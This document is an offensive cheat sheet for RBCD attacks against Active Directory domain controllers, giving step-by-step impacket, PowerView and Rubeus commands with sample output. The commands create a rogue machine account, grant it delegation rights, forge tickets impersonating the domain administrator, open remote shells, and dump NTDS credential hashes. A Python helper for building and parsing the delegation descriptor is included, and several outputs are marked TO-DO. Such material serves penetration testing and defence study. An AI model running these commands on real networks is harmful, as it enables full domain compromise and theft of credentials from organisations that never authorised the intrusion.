RBCD Attack
1. Create a Fake Computer [Optional]
# Check machine account quota
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -M maq
Sample Output:
$ nxc ldap example.com -u 'test.user' -p 'Test1234' -M maq
SMB         10.10.11.10      445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:example.com) (signing:True) (SMBv1:False)
LDAP        10.10.11.10      389    DC               [+] example.com\test.user:Test1234 
MAQ         10.10.11.10      389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.11.10      389    DC               MachineAccountQuota: 10
# Add a fake computer
impacket-addcomputer -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>' -dc-ip <DC_IP> '<DOMAIN>/<USER>:<PASSWORD>'
Sample Output:
$ impacket-addcomputer -computer-name 'EvilComputer' -computer-pass 'Test1234' -dc-ip 10.10.11.10 'example.com/test.user:Test1234'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Test1234.
2. Get Service Principal Name (SPN) [Optional]
# Password
impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web:Password' -dc-ip 10.10.132.53 -request                                 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
ServicePrincipalName      Name             MemberOf  PasswordLastSet             LastLogon                   Delegation 
------------------------  ---------------  --------  --------------------------  --------------------------  ----------   
MSSQL/ms01.example.com  svc_web            2023-06-07 17:48:26.340517  2025-08-06 08:14:20.426867
# Kerberos
sudo ntpdate -s <DC_IP> && impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -request -k
Sample Output:
TO-DO
# If NTLM auth is disabled
sudo ntpdate -s <DC_IP> && impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-host <DC> -request -k
Sample Output:
TO-DO
3. RBCD Attack [Control over an Account with SPN]
impacket-rbcd -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -dc-ip <DC_IP> -action 'write' '<DOMAIN>/<USER>:<PASSWORD>'
Sample Output:
$ impacket-rbcd -delegate-to 'DC$' -delegate-from 'EvilComputer$' -dc-ip 10.10.11.10 -action 'write' 'example.com/test.user:Test1234' 
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     EvilComputer$   (S-1-5-21-3542429192-2036945976-3483670807-11601)
Note: The -delegate-to object is the target. The authenticating user must be able to write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute (GenericWrite, WriteProperty on that attribute, or ownership of the object).
Note: The -delegate-from account must have an SPN (computer accounts have one by default); it does not need to be a computer.
Note: Remove the trailing $ if it is not a machine account.
4. Impersonate
# Password
sudo ntpdate -s <DC_IP> && impacket-getST -spn cifs/<TARGET_DOMAIN> -impersonate <TARGET_USER> -dc-ip <DC_IP> '<DOMAIN>/<COMPUTER>:<COMPUTER_PASSWORD>'
Sample Output:
$ sudo ntpdate -s dc.example.com && impacket-getST -spn cifs/dc.example.com -impersonate administrator -dc-ip 10.10.11.10 'example.com/EvilComputer:Test1234'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# NT hash
sudo ntpdate -s <DC_IP> && impacket-getST -spn cifs/<TARGET_DOMAIN> -impersonate <TARGET_USER> -dc-ip <DC_IP> '<DOMAIN>/<COMPUTER>' -hashes ':<HASH>'
Sample Output:
TO-DO
5. Import Ticket
export KRB5CCNAME='<CCACHE_FILE>'
Sample Output:
$ export KRB5CCNAME='administrator@cifs_dc.example.com@EXAMPLE.COM.ccache'
6. Post-Attack
# Remote (psexec, wmiexec and smbexec all accept the imported ticket via -k -no-pass)
sudo ntpdate -s <DC_IP> && impacket-wmiexec <DOMAIN>/<TARGET_USER>@<TARGET_DOMAIN> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc.example.com && wmiexec.py example.com/administrator@dc.example.com -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
# Or secretsdump
impacket-secretsdump <TARGET_USER>@<TARGET_DOMAIN> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
RBCD Attack (Windows)
1. Import Modules
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> . .\PowerView.ps1
. .\Powermad.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> . .\Powermad.ps1
Ref: Powermad.ps1
2. Check Machine Account Quota
Get-DomainObject -Identity 'DC=<EXAMPLE>,DC=<COM>' | select ms-ds-machineaccountquota
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-DomainObject -Identity 'DC=EXAMPLE,DC=COM' | select ms-ds-machineaccountquota
ms-ds-machineaccountquota
-------------------------
                       10
3. Create New Computer Account
New-MachineAccount -MachineAccount EvilComputer -Password $(ConvertTo-SecureString '<COMPUTER_PASSWORD>' -AsPlainText -Force)
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> New-MachineAccount -MachineAccount EvilComputer -Password $(ConvertTo-SecureString 'Test1234' -AsPlainText -Force)
[+] Machine account EvilComputer added
4. RBCD Attack
$fakesid = Get-DomainComputer EvilComputer | select -expand objectsid
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $fakesid = Get-DomainComputer EvilComputer | select -expand objectsid
$fakesid
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $fakesid
S-1-5-21-3542429192-2036945976-3483670807-11601
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <TARGET_COMPUTER> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
5. Check that the SecurityIdentifier in the DACL is now $fakesid
$RawBytes = Get-DomainComputer <TARGET_COMPUTER> -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> $Descriptor.DiscretionaryAcl
BinaryLength       : 36
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-3542429192-2036945976-3483670807-11601
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None
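What impacket-rbcd writes in step 3 and what the PowerView check above reads back is a self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity. The following Python is an added example, not code from this page, impacket or PowerView: it builds that descriptor for a list of SIDs with the same shape as the PowerView SDDL (owner BA, one full-control ACCESS_ALLOWED ACE per SID, mask 0xF01FF), parses one back to list the allowed accounts (the step-5 check done by hand, usable on bytes pulled from LDAP), and drops a SID for cleanup. The SID used in the test is the one from the sample output above; all other values are fixed by MS-DTYP.

```python
import struct

FULL_CONTROL = 0x000F01FF           # CCDCLCSWRPWPDTLOCRSDRCWDWO, shown as AccessMask 983551 above
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
BUILTIN_ADMINS = "S-1-5-32-544"     # the "O:BA" owner in the PowerView SDDL
FAKE_SID = "S-1-5-21-3542429192-2036945976-3483670807-11601"  # EvilComputer$ from the sample output


def sid_to_bytes(sid: str) -> bytes:
    """S-1-5-21-... -> binary SID (revision, count, 48-bit big-endian authority, LE sub-authorities)."""
    parts = sid.split("-")
    assert parts[0] == "S", "not a SID string"
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int = 0):
    """Return (sid_string, byte_length) for the binary SID at buf[off:]."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: owner BA, DACL = one full-control allow ACE per SID."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size; then mask, then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: revision 2 (no object ACEs), sbz1, size, ACE count, sbz2
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    header_len = 20
    # SD header: revision, sbz1, control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    hdr = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                      header_len, 0, 0, header_len + len(owner))
    return hdr + owner + acl


def parse_rbcd_sd(sd: bytes):
    """Return [(ace_type, mask, sid)] for every ACCESS_ALLOWED ACE in the DACL; [] if no DACL."""
    if len(sd) < 20:
        return []
    revision, _, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    entries = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:      # other ACE types are skipped by size
            mask = struct.unpack_from("<I", sd, pos + 4)[0]
            sid, _ = sid_from_bytes(sd, pos + 8)
            entries.append((ace_type, mask, sid))
        pos += ace_size
    return entries


def allowed_sids(sd: bytes):
    """The accounts currently allowed to act on behalf of other identities (impacket-rbcd -action read)."""
    return [entry[2] for entry in parse_rbcd_sd(sd)]


def remove_sid(sd: bytes, sid: str) -> bytes:
    """Cleanup: rebuild the descriptor without one trustee (impacket-rbcd -action remove)."""
    return build_rbcd_sd([s for s in allowed_sids(sd) if s != sid])


if __name__ == "__main__":
    sd = build_rbcd_sd([FAKE_SID])
    print(len(sd), "bytes;", allowed_sids(sd))
```

Feeding the raw attribute bytes from Get-DomainComputer or an LDAP search into parse_rbcd_sd gives the same SID list as the $Descriptor.DiscretionaryAcl output above; an empty result means the attribute is unset. To clear the attribute entirely use impacket-rbcd -action flush or Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'.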
6. Impersonate
.\rubeus.exe hash /password:'<COMPUTER_PASSWORD>' /user:EvilComputer /domain:<DOMAIN>
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> .\rubeus.exe hash /password:'Test1234' /user:EvilComputer /domain:example.com
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password             : Test1234
[*] Input username             : EvilComputer
[*] Input domain               : example.com
[*] Salt                       : EXAMPLE.COMEvilComputer
[*]       rc4_hmac             : B9E0CFCEAF6D077970306A2FD88A7C0A
[*]       aes128_cts_hmac_sha1 : FE834E7490537D833B4FBB0C215BEDB3
[*]       aes256_cts_hmac_sha1 : D105000C879775D1727D9E56EF0CA48FD2996B9370165832BB1C5A265922B359
[*]       des_cbc_md5          : DAE66B133454FDB5
.\rubeus.exe s4u /user:'EvilComputer$' /rc4:<HASH> /impersonateuser:administrator /msdsspn:cifs/<TARGET_DOMAIN> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> .\rubeus.exe s4u /user:'EvilComputer$' /rc4:B9E0CFCEAF6D077970306A2FD88A7C0A /impersonateuser:administrator /msdsspn:cifs/dc.example.com /ptt /nowrap
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: B9E0CFCEAF6D077970306A2FD88A7C0A
[*] Building AS-REQ (w/ preauth) for: 'example.com\EvilComputer$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
      doIFuDCCBb ---[SNIP]--- VyLmh0Yg==
[*] Action: S4U
[*] Building S4U2self request for: 'EvilComputer$@EXAMPLE.COM'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'EvilComputer$@EXAMPLE.COM'
[*] base64(ticket.kirbi):
      doIGCjCCBg ---[SNIP]--- 1wdXRlciQ=
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.example.com'
[*] Building S4U2proxy request for service: 'cifs/dc.example.com'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.example.com':
      doIGujCCBr ---[SNIP]--- VyLmh0Yg==
[+] Ticket successfully imported!
7. Convert to ccache Format
python3 rubeustoccache.py '<BASE64_TICKET>' secrets.kirbi secrets.ccache
Sample Output:
$ python3 rubeustoccache.py 'doIGujCCBr ---[SNIP]--- VyLmh0Yg==' secrets.kirbi secrets.ccache
╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤ 
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to secrets.kirbi
[*] Writing converted .ccache file to secrets.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=secrets.ccache
export KRB5CCNAME=secrets.ccache
Sample Output:
$ export KRB5CCNAME=secrets.ccache
Ref: RubeusToCcache
8. Post-Attack
# Remote
sudo ntpdate -s <DC_IP> && impacket-psexec <DOMAIN>/administrator@<TARGET_DOMAIN> -k -no-pass
Sample Output:
$ sudo ntpdate -s dc.example.com && impacket-psexec example.com/administrator@dc.example.com -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Requesting shares on dc.example.com.....
[*] Found writable share ADMIN$
[*] Uploading file sxEWFPos.exe
[*] Opening SVCManager on dc.example.com.....
[*] Creating service OtwL on dc.example.com.....
[*] Starting service OtwL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> 
# Or secretsdump
impacket-secretsdump administrator@<TARGET_DOMAIN> -k -no-pass -just-dc-user Administrator
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
SPN-Less RBCD Attack
1. RBCD
impacket-rbcd -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>' -dc-ip <DC_IP> -action 'write' '<DOMAIN>/<USER>:<PASSWORD>'
Sample Output:
$ impacket-rbcd -delegate-from 'aseed' -delegate-to 'DC$' -dc-ip 10.10.86.220 -action 'write' 'example.com/aseed:gB6XTcqVP5MlP7Rc'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] aseed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     aseed        (S-1-5-21-4029599044-1972224926-2225194048-1126)
2. Generate NT Hash
# NT hash = MD4(UTF-16LE(password)); on OpenSSL 3.x md4 lives in the legacy provider, so add: -provider legacy -provider default
iconv -f ASCII -t UTF-16LE <(printf '<PASSWORD>') | openssl dgst -md4
Sample Output:
$ iconv -f ASCII -t UTF-16LE <(printf 'gB6XTcqVP5MlP7Rc') | openssl dgst -md4
MD4(stdin)= 8ecffccc2f22c1607b8e104296ffbf68
3. Request a TGT (authenticate with the NT hash so the KDC negotiates RC4 and the ticket session key is a 16-byte key that can later be set as an NT hash)
impacket-getTGT '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -hashes ':<HASH>'
Sample Output:
$ impacket-getTGT 'example.com/aseed@DC.example.com' -hashes ':8ecffccc2f22c1607b8e104296ffbf68'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Saving ticket in aseed@DC.example.com.ccache
4. Get Session Key
# Import ticket
export KRB5CCNAME='<CCACHE_FILE>'
Sample Output:
$ export KRB5CCNAME='aseed@DC.example.com.ccache'
# Get ticket session key
impacket-describeTicket '<CCACHE_FILE>' | grep 'Ticket Session Key' 
Sample Output:
$ impacket-describeTicket aseed@DC.example.com.ccache | grep 'Ticket Session Key' 
[*] Ticket Session Key            : 49e0cd8abe883d869f5af9ad8556fb29
5. Set the User's NT Hash to the TGT Session Key
# This resets the account's password to the session key; keep the original hash from step 2 so it can be restored afterwards
impacket-changepasswd '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>' -newhashes :<SESSION_KEY>
# Restore the original hash once done
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -hashes :<SESSION_KEY> -newhashes :<HASH>
Sample Output:
$ impacket-changepasswd -newhashes :49e0cd8abe883d869f5af9ad8556fb29 'example.com/aseed:gB6XTcqVP5MlP7Rc@DC.example.com'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Changing the password of example.com\aseed
[*] Connecting to DCE/RPC as example.com\aseed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
6. Get a Service Ticket
impacket-getST '<DOMAIN>/<USER>' -k -no-pass -u2u -impersonate 'Administrator' -spn 'cifs/<TARGET_DOMAIN>'
Sample Output:
$ impacket-getST 'example.com/aseed' -k -no-pass -u2u -impersonate 'Administrator' -spn 'cifs/DC.example.com'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@EXAMPLE.COM.ccache
7. Secrets Dump
# Import ticket
export KRB5CCNAME='<CCACHE_FILE_2>'
Sample Output:
$ export KRB5CCNAME='Administrator@cifs_DC.example.com@EXAMPLE.COM.ccache'
# Secrets dump
impacket-secretsdump '<TARGET_USER>@<TARGET_DOMAIN>' -k -no-pass
Sample Output:
TO-DO